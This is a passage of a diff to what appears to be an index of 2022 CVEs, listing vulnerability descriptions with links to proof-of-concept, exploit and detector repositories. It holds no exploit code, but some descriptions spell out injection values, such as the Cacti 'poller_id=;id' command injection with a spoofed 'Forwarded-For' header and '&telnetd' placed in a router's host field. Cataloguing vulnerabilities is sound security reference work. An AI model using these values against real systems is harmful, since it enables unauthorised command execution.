into the error modal container. + + +- [goseungduk/beekeeper](https://github.com/goseungduk/beekeeper) + +### CVE-2022-43144 (2022-11-08) + +A cross-site scripting (XSS) vulnerability in Canteen Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + + +- [mudassiruddin/CVE-2022-43144-Stored-XSS](https://github.com/mudassiruddin/CVE-2022-43144-Stored-XSS) + +### CVE-2022-43271 (2022-12-22) + +Inhabit Systems Pty Ltd Move CRM version 4, build 260 was discovered to contain a cross-site scripting (XSS) vulnerability via the User profile component. + + +- [SecurityWillCheck/CVE-2022-43271](https://github.com/SecurityWillCheck/CVE-2022-43271) + +### CVE-2022-43293 (2023-04-11) + +Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \Wacom\Wacom_Tablet.exe. + + +- [LucaBarile/CVE-2022-43293](https://github.com/LucaBarile/CVE-2022-43293) + +### CVE-2022-43332 (2022-11-17) + +A cross-site scripting (XSS) vulnerability in Wondercms v3.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Site title field of the Configuration Panel. + + +- [maikroservice/CVE-2022-43332](https://github.com/maikroservice/CVE-2022-43332) + +### CVE-2022-43343 (2022-11-08) + +N-Prolog v1.91 was discovered to contain a global buffer overflow vulnerability in the function gettoken() at Main.c. + + +- [Halcy0nic/CVE-2022-43343](https://github.com/Halcy0nic/CVE-2022-43343) + +### CVE-2022-43369 (2022-12-06) + +AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php. + + +- [sudoninja-noob/CVE-2022-43369](https://github.com/sudoninja-noob/CVE-2022-43369) + +### CVE-2022-43571 (2022-11-03) + +In Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, an authenticated user can execute arbitrary code through the dashboard PDF generation component.\n\n + + +- [ohnonoyesyes/CVE-2022-43571](https://github.com/ohnonoyesyes/CVE-2022-43571) + +### CVE-2022-43680 (2022-10-24) + +In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations. + + +- [Trinadh465/external_expat-2.1.0_CVE-2022-43680](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-43680) +- [nidhihcl/external_expat_2.1.0_CVE-2022-43680](https://github.com/nidhihcl/external_expat_2.1.0_CVE-2022-43680) + +### CVE-2022-43704 (2023-01-20) + +The Sinilink XY-WFT1 WiFi Remote Thermostat, running firmware 1.3.6, allows an attacker to bypass the intended requirement to communicate using MQTT. It is possible to replay Sinilink aka SINILINK521 protocol (udp/1024) commands interfacing directly with the target device. This, in turn, allows for an attack to control the onboard relay without requiring authentication via the mobile application. This might result in an unacceptable temperature within the target device's physical environment. + + +- [9lyph/CVE-2022-43704](https://github.com/9lyph/CVE-2022-43704) + +### CVE-2022-43959 (2023-01-20) + +Insufficiently Protected Credentials in the AD/LDAP server settings in 1C-Bitrix Bitrix24 through 22.200.200 allow remote administrators to discover an AD/LDAP administrative password by reading the source code of /bitrix/admin/ldap_server_edit.php. + + +- [secware-ru/CVE-2022-43959](https://github.com/secware-ru/CVE-2022-43959) + +### CVE-2022-43980 (2023-01-27) + +There is a stored cross-site scripting vulnerability in Pandora FMS v765 in the network maps editing functionality. An attacker could modify a network map, including on purpose the name of an XSS payload. Once created, if a user with admin privileges clicks on the edited network maps, the XSS payload will be executed. The exploitation of this vulnerability could allow an atacker to steal the value of the admin user´s cookie. + + +- [Argonx21/CVE-2022-43980](https://github.com/Argonx21/CVE-2022-43980) + +### CVE-2022-44118 (2022-11-23) + +dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via file_manage_control.php. + + +- [Athishpranav2003/CVE-2022-44118-Exploit](https://github.com/Athishpranav2003/CVE-2022-44118-Exploit) + +### CVE-2022-44136 (2022-11-30) + +Zenario CMS 9.3.57186 is vulnerable to Remote Code Excution (RCE). + + +- [IgorDuino/CVE-2022-44136-exploit](https://github.com/IgorDuino/CVE-2022-44136-exploit) + +### CVE-2022-44149 (2023-01-06) + +The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 and 80.103.2.5045 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required + + +- [yerodin/CVE-2022-44149](https://github.com/yerodin/CVE-2022-44149) +- [geniuszlyy/CVE-2022-44149](https://github.com/geniuszlyy/CVE-2022-44149) + +### CVE-2022-44183 (2022-11-21) + +Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic. + + +- [flagqaz/CVE-2022-44183](https://github.com/flagqaz/CVE-2022-44183) + +### CVE-2022-44215 (2023-08-22) + +There is an open redirect vulnerability in Titan FTP server 19.0 and below. Users are redirected to any target URL. + + +- [JBalanza/CVE-2022-44215](https://github.com/JBalanza/CVE-2022-44215) + +### CVE-2022-44268 (2023-02-06) + +ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it). + + +- [duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC](https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC) +- [y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment](https://github.com/y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment) +- [agathanon/cve-2022-44268](https://github.com/agathanon/cve-2022-44268) +- [jnschaeffer/cve-2022-44268-detector](https://github.com/jnschaeffer/cve-2022-44268-detector) +- [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc) +- [Baikuya/CVE-2022-44268-PoC](https://github.com/Baikuya/CVE-2022-44268-PoC) +- [voidz0r/CVE-2022-44268](https://github.com/voidz0r/CVE-2022-44268) +- [Sybil-Scan/imagemagick-lfi-poc](https://github.com/Sybil-Scan/imagemagick-lfi-poc) +- [Vulnmachines/imagemagick-CVE-2022-44268](https://github.com/Vulnmachines/imagemagick-CVE-2022-44268) +- [kljunowsky/CVE-2022-44268](https://github.com/kljunowsky/CVE-2022-44268) +- [nfm/heroku-CVE-2022-44268-reproduction](https://github.com/nfm/heroku-CVE-2022-44268-reproduction) +- [betillogalvanfbc/POC-CVE-2022-44268](https://github.com/betillogalvanfbc/POC-CVE-2022-44268) +- [adhikara13/CVE-2022-44268-MagiLeak](https://github.com/adhikara13/CVE-2022-44268-MagiLeak) +- [bhavikmalhotra/CVE-2022-44268-Exploit](https://github.com/bhavikmalhotra/CVE-2022-44268-Exploit) +- [entr0pie/CVE-2022-44268](https://github.com/entr0pie/CVE-2022-44268) +- [Pog-Frog/cve-2022-44268](https://github.com/Pog-Frog/cve-2022-44268) +- [narekkay/auto-cve-2022-44268.sh](https://github.com/narekkay/auto-cve-2022-44268.sh) +- [fanbyprinciple/ImageMagick-lfi-poc](https://github.com/fanbyprinciple/ImageMagick-lfi-poc) +- [chairat095/CVE-2022-44268_By_Kyokito](https://github.com/chairat095/CVE-2022-44268_By_Kyokito) +- [atici/Exploit-for-ImageMagick-CVE-2022-44268](https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268) +- [Vagebondcur/IMAGE-MAGICK-CVE-2022-44268](https://github.com/Vagebondcur/IMAGE-MAGICK-CVE-2022-44268) +- [NataliSemi/-CVE-2022-44268](https://github.com/NataliSemi/-CVE-2022-44268) +- [CygnusX-26/CVE-2022-44268-fixed-PoC](https://github.com/CygnusX-26/CVE-2022-44268-fixed-PoC) +- [PanAdamski/CVE-2022-44268-automated](https://github.com/PanAdamski/CVE-2022-44268-automated) +- [FlojBoj/CVE-2022-44268](https://github.com/FlojBoj/CVE-2022-44268) + +### CVE-2022-44276 (2023-06-28) + +In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE. + + +- [HerrLeStrate/CVE-2022-44276-PoC](https://github.com/HerrLeStrate/CVE-2022-44276-PoC) + +### CVE-2022-44311 (2022-11-08) + +html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file. + + +- [Halcy0nic/CVE-2022-44311](https://github.com/Halcy0nic/CVE-2022-44311) +- [DesmondSanctity/CVE-2022-44311](https://github.com/DesmondSanctity/CVE-2022-44311) + +### CVE-2022-44312 (2022-11-08) + +PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the ExpressionCoerceInteger function in expression.c when called from ExpressionInfixOperator. + + +- [Halcy0nic/CVEs-for-picoc-3.2.2](https://github.com/Halcy0nic/CVEs-for-picoc-3.2.2) + +### CVE-2022-44318 (2022-11-08) + +PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the StringStrcat function in cstdlib/string.c when called from ExpressionParseFunctionCall. + + +- [Halcy0nic/CVE-2022-44318](https://github.com/Halcy0nic/CVE-2022-44318) + +### CVE-2022-44569 (2023-11-03) + +A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication. + + +- [rweijnen/ivanti-automationmanager-exploit](https://github.com/rweijnen/ivanti-automationmanager-exploit) + +### CVE-2022-44666 (2022-12-13) + +Windows Contacts Remote Code Execution Vulnerability + + +- [j00sean/CVE-2022-44666](https://github.com/j00sean/CVE-2022-44666) + +### CVE-2022-44721 +- [gmh5225/CVE-2022-44721-CsFalconUninstaller](https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller) + +### CVE-2022-44789 (2022-11-23) + +A logical issue in O_getOwnPropertyDescriptor() in Artifex MuJS 1.0.0 through 1.3.x before 1.3.2 allows an attacker to achieve Remote Code Execution through memory corruption, via the loading of a crafted JavaScript file. + + +- [alalng/CVE-2022-44789](https://github.com/alalng/CVE-2022-44789) + +### CVE-2022-44830 (2022-11-21) + +Sourcecodester Event Registration App v1.0 was discovered to contain multiple CSV injection vulnerabilities via the First Name, Contact and Remarks fields. These vulnerabilities allow attackers to execute arbitrary code via a crafted excel file. + + +- [RashidKhanPathan/CVE-2022-44830](https://github.com/RashidKhanPathan/CVE-2022-44830) + +### CVE-2022-44870 (2023-01-06) + +A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module. + + +- [Cedric1314/CVE-2022-44870](https://github.com/Cedric1314/CVE-2022-44870) + +### CVE-2022-44875 (2023-03-06) + +KioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code. + + +- [AesirSec/CVE-2022-44875-Test](https://github.com/AesirSec/CVE-2022-44875-Test) + +### CVE-2022-44877 (2023-01-05) + +login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter. + + +- [numanturle/CVE-2022-44877](https://github.com/numanturle/CVE-2022-44877) +- [komomon/CVE-2022-44877-RCE](https://github.com/komomon/CVE-2022-44877-RCE) +- [ColdFusionX/CVE-2022-44877-CWP7](https://github.com/ColdFusionX/CVE-2022-44877-CWP7) +- [Chocapikk/CVE-2022-44877](https://github.com/Chocapikk/CVE-2022-44877) +- [hotpotcookie/CVE-2022-44877-white-box](https://github.com/hotpotcookie/CVE-2022-44877-white-box) +- [RicYaben/CVE-2022-44877-LAB](https://github.com/RicYaben/CVE-2022-44877-LAB) +- [dkstar11q/CVE-2022-44877](https://github.com/dkstar11q/CVE-2022-44877) +- [rhymsc/CVE-2022-44877-RCE](https://github.com/rhymsc/CVE-2022-44877-RCE) +- [G01d3nW01f/CVE-2022-44877](https://github.com/G01d3nW01f/CVE-2022-44877) + +### CVE-2022-44900 (2022-12-06) + +A directory traversal vulnerability in the SevenZipFile.extractall() function of the python library py7zr v0.20.0 and earlier allows attackers to write arbitrary files via extracting a crafted 7z file. + + +- [0xless/CVE-2022-44900-demo-lab](https://github.com/0xless/CVE-2022-44900-demo-lab) + +### CVE-2022-45003 (2023-03-22) + +Gophish through 0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted payload involving autofocus. + + +- [mha98/CVE-2022-45003](https://github.com/mha98/CVE-2022-45003) + +### CVE-2022-45004 (2023-03-22) + +Gophish through 0.12.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted landing page. + + +- [mha98/CVE-2022-45004](https://github.com/mha98/CVE-2022-45004) + +### CVE-2022-45025 (2022-12-07) + +Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function. + + +- [yuriisanin/CVE-2022-45025](https://github.com/yuriisanin/CVE-2022-45025) +- [andyhsu024/CVE-2022-45025](https://github.com/andyhsu024/CVE-2022-45025) + +### CVE-2022-45047 (2022-11-16) + +Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server. + + +- [hktalent/CVE-2022-45047](https://github.com/hktalent/CVE-2022-45047) + +### CVE-2022-45059 (2022-11-09) + +An issue was discovered in Varnish Cache 7.x before 7.1.2 and 7.2.x before 7.2.1. A request smuggling attack can be performed on Varnish Cache servers by requesting that certain headers are made hop-by-hop, preventing the Varnish Cache servers from forwarding critical headers to the backend. + + +- [martinvks/CVE-2022-45059-demo](https://github.com/martinvks/CVE-2022-45059-demo) + +### CVE-2022-45217 (2022-12-07) + +A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Level parameter under the Add New System User module. + + +- [sudoninja-noob/CVE-2022-45217](https://github.com/sudoninja-noob/CVE-2022-45217) + +### CVE-2022-45265 +- [maikroservice/CVE-2022-45265](https://github.com/maikroservice/CVE-2022-45265) + +### CVE-2022-45299 (2023-01-13) + +An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL. + + +- [offalltn/CVE-2022-45299](https://github.com/offalltn/CVE-2022-45299) + +### CVE-2022-45354 (2024-01-08) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.7.60.\n\n + + +- [RandomRobbieBF/CVE-2022-45354](https://github.com/RandomRobbieBF/CVE-2022-45354) +- [NekomataCode/CVE-2022-45354](https://github.com/NekomataCode/CVE-2022-45354) + +### CVE-2022-45436 (2023-02-15) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all platforms, allows Cross-Site Scripting (XSS). As a manager privilege user , create a network map containing name as xss payload. Once created, admin user must click on the edit network maps and XSS payload will be executed, which could be used for stealing admin users cookie value.\n\n + + +- [damodarnaik/CVE-2022-45436](https://github.com/damodarnaik/CVE-2022-45436) + +### CVE-2022-45451 (2023-08-31) + +Local privilege escalation due to insecure driver communication port permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173, Acronis Agent (Windows) before build 30600, Acronis Cyber Protect 15 (Windows) before build 30984. + + +- [alfarom256/CVE-2022-45451](https://github.com/alfarom256/CVE-2022-45451) + +### CVE-2022-45472 (2022-11-23) + +CAE LearningSpace Enterprise (with Intuity License) image 267r patch 639 allows DOM XSS, related to ontouchmove and onpointerup. + + +- [nicbrinkley/CVE-2022-45472](https://github.com/nicbrinkley/CVE-2022-45472) + +### CVE-2022-45477 (2022-12-05) + +Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + + +- [M507/nmap-vulnerability-scan-scripts](https://github.com/M507/nmap-vulnerability-scan-scripts) + +### CVE-2022-45511 (2022-12-08) + +Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the PPPOEPassword parameter at /goform/QuickIndex. + + +- [kinderscsaa/cve-2022-45511](https://github.com/kinderscsaa/cve-2022-45511) + +### CVE-2022-45544 (2023-02-07) + +Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role. + + +- [tristao-marinho/CVE-2022-45544](https://github.com/tristao-marinho/CVE-2022-45544) + +### CVE-2022-45599 (2023-02-22) + +Aztech WMB250AC Mesh Routers Firmware Version 016 2020 is vulnerable to PHP Type Juggling in file /var/www/login.php, allows attackers to gain escalated privileges only when specific conditions regarding a given accounts hashed password. + + +- [ethancunt/CVE-2022-45599](https://github.com/ethancunt/CVE-2022-45599) + +### CVE-2022-45600 (2023-02-22) + +Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login. + + +- [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600) + +### CVE-2022-45688 (2022-12-13) + +A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. + + +- [scabench/jsonorg-tp1](https://github.com/scabench/jsonorg-tp1) +- [scabench/jsonorg-fp1](https://github.com/scabench/jsonorg-fp1) +- [scabench/jsonorg-fp2](https://github.com/scabench/jsonorg-fp2) +- [scabench/jsonorg-fp3](https://github.com/scabench/jsonorg-fp3) +- [scabench/jsonorg-fn1](https://github.com/scabench/jsonorg-fn1) + +### CVE-2022-45701 (2023-02-17) + +Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature. + + +- [yerodin/CVE-2022-45701](https://github.com/yerodin/CVE-2022-45701) +- [geniuszlyy/CVE-2022-45701](https://github.com/geniuszlyy/CVE-2022-45701) + +### CVE-2022-45728 (2023-01-12) + +Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability. + + +- [sudoninja-noob/CVE-2022-45728](https://github.com/sudoninja-noob/CVE-2022-45728) + +### CVE-2022-45729 (2023-01-12) + +A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter. + + +- [sudoninja-noob/CVE-2022-45729](https://github.com/sudoninja-noob/CVE-2022-45729) + +### CVE-2022-45770 (2023-01-26) + +Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation. + + +- [Marsel-marsel/CVE-2022-45770](https://github.com/Marsel-marsel/CVE-2022-45770) + +### CVE-2022-45771 (2022-12-05) + +An issue in the /api/audits component of Pwndoc v0.5.3 allows attackers to escalate privileges and execute arbitrary code via uploading a crafted audit file. + + +- [p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE](https://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE) +- [yuriisanin/CVE-2022-45771](https://github.com/yuriisanin/CVE-2022-45771) + +### CVE-2022-45808 (2023-01-24) + +SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + + +- [RandomRobbieBF/CVE-2022-45808](https://github.com/RandomRobbieBF/CVE-2022-45808) + +### CVE-2022-45934 (2022-11-27) + +An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets. + + +- [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934) +- [Trinadh465/linux-4.1.15_CVE-2022-45934](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-45934) +- [Satheesh575555/linux-4.1.15_CVE-2022-45934](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-45934) + +### CVE-2022-45988 (2023-03-03) + +starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload. + + +- [happy0717/CVE-2022-45988](https://github.com/happy0717/CVE-2022-45988) + +### CVE-2022-46080 (2023-07-06) + +Nexxt Nebula 1200-AC 15.03.06.60 allows authentication bypass and command execution by using the HTTPD service to enable TELNET. + + +- [yerodin/CVE-2022-46080](https://github.com/yerodin/CVE-2022-46080) +- [geniuszlyy/CVE-2022-46080](https://github.com/geniuszlyy/CVE-2022-46080) + +### CVE-2022-46087 (2023-01-30) + +CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user. + + +- [G37SYS73M/CVE-2022-46087](https://github.com/G37SYS73M/CVE-2022-46087) + +### CVE-2022-46104 +- [NurSec747/CVE-2022-46104---POC](https://github.com/NurSec747/CVE-2022-46104---POC) + +### CVE-2022-46164 (2022-12-05) + +NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling a specially crafted payload can be used to impersonate other users and takeover accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit `48d143921753914da45926cca6370a92ed0c46b8` into their codebase to patch the exploit.\n + + +- [stephenbradshaw/CVE-2022-46164-poc](https://github.com/stephenbradshaw/CVE-2022-46164-poc) + +### CVE-2022-46166 (2022-12-09) + +Spring boot admins is an open source administrative user interface for management of spring boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent releases of Spring Boot Admin 2.6.10 and 2.7.8 to resolve this issue. Users unable to upgrade may disable any notifier or disable write access (POST request) on `/env` actuator endpoint.\n\n + + +- [DickDock/CVE-2022-46166](https://github.com/DickDock/CVE-2022-46166) + +### CVE-2022-46169 (2022-12-05) + +Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`.\n\nThis command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch. + + +- [imjdl/CVE-2022-46169](https://github.com/imjdl/CVE-2022-46169) +- [0xf4n9x/CVE-2022-46169](https://github.com/0xf4n9x/CVE-2022-46169) +- [taythebot/CVE-2022-46169](https://github.com/taythebot/CVE-2022-46169) +- [Inplex-sys/CVE-2022-46169](https://github.com/Inplex-sys/CVE-2022-46169) +- [sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169) +- [c3rrberu5/CVE-2022-46169](https://github.com/c3rrberu5/CVE-2022-46169) +- [Habib0x0/CVE-2022-46169](https://github.com/Habib0x0/CVE-2022-46169) +- [N1arut/CVE-2022-46169_POC](https://github.com/N1arut/CVE-2022-46169_POC) +- [miko550/CVE-2022-46169](https://github.com/miko550/CVE-2022-46169) +- [ariyaadinatha/cacti-cve-2022-46169-exploit](https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit) +- [doosec101/CVE-2022-46169](https://github.com/doosec101/CVE-2022-46169) +- [m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application](https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application) +- [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc) +- [JacobEbben/CVE-2022-46169_unauth_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46169_unauth_remote_code_execution) +- [icebreack/CVE-2022-46169](https://github.com/icebreack/CVE-2022-46169) +- [devilgothies/CVE-2022-46169](https://github.com/devilgothies/CVE-2022-46169) +- [yassinebk/CVE-2022-46169](https://github.com/yassinebk/CVE-2022-46169) +- [ruycr4ft/CVE-2022-46169](https://github.com/ruycr4ft/CVE-2022-46169) +- [FredBrave/CVE-2022-46169-CACTI-1.2.22](https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22) +- [sha-16/RCE-Cacti-1.2.22](https://github.com/sha-16/RCE-Cacti-1.2.22) +- [Safarchand/CVE-2022-46169](https://github.com/Safarchand/CVE-2022-46169) +- [MarkStrendin/CVE-2022-46169](https://github.com/MarkStrendin/CVE-2022-46169) +- [BKreisel/CVE-2022-46169](https://github.com/BKreisel/CVE-2022-46169) +- [Rickster5555/EH2-PoC](https://github.com/Rickster5555/EH2-PoC) +- [antisecc/CVE-2022-46169](https://github.com/antisecc/CVE-2022-46169) +- [dawnl3ss/CVE-2022-46169](https://github.com/dawnl3ss/CVE-2022-46169) +- [a1665454764/CVE-2022-46169](https://github.com/a1665454764/CVE-2022-46169) +- [0xZon/CVE-2022-46169-Exploit](https://github.com/0xZon/CVE-2022-46169-Exploit) +- [copyleftdev/PricklyPwn](https://github.com/copyleftdev/PricklyPwn) +- [0xN7y/CVE-2022-46169](https://github.com/0xN7y/CVE-2022-46169) +- [mind2hex/CVE-2022-46169](https://github.com/mind2hex/CVE-2022-46169) +- [HPT-Intern-Task-Submission/CVE-2022-46169](https://github.com/HPT-Intern-Task-Submission/CVE-2022-46169) + +### CVE-2022-46175 (2022-12-24) + +JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later. + + +- [giz-berlin/quasar-app-webpack-json5-vulnerability](https://github.com/giz-berlin/quasar-app-webpack-json5-vulnerability) + +### CVE-2022-46196 +- [dpgg101/CVE-2022-46196](https://github.com/dpgg101/CVE-2022-46196) + +### CVE-2022-46381 (2022-12-13) + +Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + + +- [amitlttwo/CVE-2022-46381](https://github.com/amitlttwo/CVE-2022-46381) + +### CVE-2022-46395 (2023-03-06) + +An issue was discovered in the Arm Mali GPU Kernel Driver. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r0p0 through r32p0, Bifrost r0p0 through r41p0 before r42p0, Valhall r19p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0. + + +- [Pro-me3us/CVE_2022_46395_Gazelle](https://github.com/Pro-me3us/CVE_2022_46395_Gazelle) +- [Pro-me3us/CVE_2022_46395_Raven](https://github.com/Pro-me3us/CVE_2022_46395_Raven) +- [SmileTabLabo/CVE-2022-46395](https://github.com/SmileTabLabo/CVE-2022-46395) + +### CVE-2022-46463 (2023-01-12) + +An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature." + + +- [nu0l/CVE-2022-46463](https://github.com/nu0l/CVE-2022-46463) +- 